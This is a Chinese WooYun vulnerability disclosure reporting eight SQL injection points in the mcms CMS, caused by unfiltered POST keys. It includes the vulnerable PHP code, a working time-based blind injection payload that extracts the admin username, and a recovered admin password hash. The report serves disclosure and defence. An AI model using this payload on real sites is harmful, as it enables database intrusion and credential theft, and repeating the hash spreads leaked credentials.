当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106318

漏洞标题:mcms最新版SQL注入8枚打包(可出任意数据)

相关厂商:mcms.cc

漏洞作者: 路人甲

提交时间:2015-04-09 12:45

修复时间:2015-07-08 12:50

公开时间:2015-07-08 12:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-09: 细节已通知厂商并且等待厂商处理中
2015-04-09: 厂商已经确认,细节仅向厂商公开
2015-04-12: 细节向第三方安全合作伙伴开放
2015-06-03: 细节向核心白帽子及相关领域专家公开
2015-06-13: 细节向普通白帽子公开
2015-06-23: 细节向实习白帽子公开
2015-07-08: 细节向公众公开

简要描述:

mcms最新版SQL注入8枚打包(可出任意数据)

详细说明:

前段时间在wooyun提交了几个mcms的漏洞,以前mcms的版本是v_3.1.1.enterprise, WooYun: mcms最新版SQL注入三枚打包(可出任意数据) ,现在都升级到v_3.1.3.enterprise了,还是来研究一下mcms(v_3.1.3.enterprise)吧。
注入一枚:POST /app/public/model.php?m=save_data&ajax=1(注意public文件夹是安装系统时取的名字)post中有本个参数,虽然都经过了xss和sql的过滤,但是过滤的并不完全,我们看看是如何注入的。
这里一共有两个表可以注入,其中product有info_id和price两个参数可以注入,message有message_id/create_time/update_time/true_time/phone/content六个参数存在注入,一共是8个注入点。这里以phone为例进行说明。
注入产生的原因是没有对key进行过滤

function m__save_data() {
    global $dbm,$C,$V;
    $_POST=H::sqlxss($_POST);
    $model_name=isset($_POST['model_name'])?$_POST['model_name']:'';
    $id=isset($_POST[$model_name.'_id'])?intval($_POST[$model_name.'_id']):0;
    if(!$C->model_table_exists($model_name)) die('{"code":1,"msg":"模型表不存在"}');
    $model_fields=array();
    foreach($_POST as $k=>$v){
        if (substr($k,0,9)=='extern___') { // 填充扩展表字段
            $model_fields[substr($k,9)] = $v;
        }
    }
    //日期特殊处理
    foreach($C->model[$model_name]['fields'] as $v){
        if($v['form_type']=='date') {
            $model_fields[$v['field_name']]=isset($model_fields[$v['field_name']])?strtotime($model_fields[$v['field_name']]):0;
        }
    }
    //print_r($C->model[$model_name]['fields']);
    //die();
    //判断扩展模型表表单
    $C->verify_model_form($model_name,$model_fields);


Post的内容经过了过滤,去看看sqlxss()是怎么实现的

public static function sqlxss($input){
    if(is_array($input)){
        foreach($input as $k=>$v){
            $input[$k]=H::sqlxss($v);
        }
    }else{
        $input=H::escape($input,1);
        $input=htmlspecialchars($input,ENT_QUOTES);
    }
    return $input;
}


对用户输入的内容先用H::escape过滤,再用htmlspecialchars过滤,我们再去看看
H::escape

public static function escape($input, $urldecode = 0) {
    if(is_array($input)){
        foreach($input as $k=>$v){
            $input[$k]=H::escape($v,$urldecode);
        }
    }else{
        $input=trim($input);
        if ($urldecode == 1) {
            $input=str_replace(array('+'),array('{addplus}'),$input);
            $input = urldecode($input);
            $input=str_replace(array('{addplus}'),array('+'),$input);
        }
        // PHP版本大于5.4.0,直接转义字符
        if (strnatcasecmp(PHP_VERSION, '5.4.0') >= 0) {
            $input = addslashes($input);
        } else {
            // 魔法转义没开启,自动加反斜杠
            if (!get_magic_quotes_gpc()) {
                $input = addslashes($input);
            }
        }
    }
    //防止最后一个反斜杠引起SQL错误如 'abc\'
    if(substr($input,-1,1)=='\\') $input=$input."'";//$input=substr($input,0,strlen($input)-1);
    return $input;
}


对用户的输入过滤的还是很彻底的,但是这里忽略了一点,那就是没有对KEY进行过滤,造成了注入。
Payload:POST提交

extern___phone`)values(''/**/or(select/**/if(ord(mid((select/**/login_name/**/from/**/mcms_user/**/limit/**/0,1),1,1))%3d108,sleep(1),0))or'')#=test&model_name=message


因为是time-based blind 注入,猜测管理员用户名的第一个字母时,若错误,延迟2s左右,如下图

猜测失败副本.jpg


若正确,延迟3s左右,如下图

猜测成功副本.jpg


按上面的方法依次做下去(burp intruder或者自己写个脚本跑),可测试管理员用户名为:mcmsadmin,密码为: f6fdffe48c908deb0f4c3bd36c032e72

漏洞证明:

见 详细说明

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-04-09 12:48

厂商回复:

修复中

最新状态:

暂无